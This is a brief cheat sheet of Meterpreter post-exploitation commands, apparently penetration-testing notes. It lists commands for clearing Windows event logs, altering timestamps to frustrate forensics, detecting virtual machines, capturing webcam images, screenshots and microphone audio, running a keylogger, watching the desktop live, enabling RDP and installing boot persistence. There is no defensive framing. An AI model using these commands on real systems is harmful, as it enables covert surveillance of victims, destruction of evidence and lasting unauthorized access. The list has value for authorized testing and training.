Meterpreter post-exploitation commands


You can pivot using a SOCKS proxy server.

  • ➡️ | root. Clear logs
meterpreter> clearev
  • ➡️ | root. Mess with timestamps to complicate forensics
meterpreter> timestomp
  • ➡️ | not tested. Check if we are in a VM
meterpreter> run post/windows/gather/checkvm
  • ➡️ Resolve a host from a name (get IP from hostname)
meterpreter> resolve hostname
  • ➡️ Random commands
meterpreter> idletime # time the host was idle
meterpreter> ipconfig # network information
meterpreter> localtime # time and date
meterpreter> getenv PATH # get PATH
meterpreter> checksum <file> # get file checksum

All the commands below require administrative/root privileges.

Take control of the webcam
meterpreter> webcam_list
meterpreter> webcam_snap
Take a screenshot
meterpreter> migrate -N explorer.exe
meterpreter> use espia
meterpreter> screengrab

You may also use screenshot 📌.

Install a keylogger
meterpreter> migrate -N explorer.exe
meterpreter> keyscan_start # start
meterpreter> keyscan_dump # dump keys
Watch the screen in real time

Watch the remote user desktop in real time

meterpreter> screenshare
Record microphone

Record audio from the default microphone for X seconds

meterpreter> record_mic
Enable Remote Desktop Protocol
meterpreter> run post/windows/manage/enable_rdp
Persistence

See METERPRETER SERVICE.

meterpreter> # Automatically start the agent when the system boots
meterpreter> run persistence -X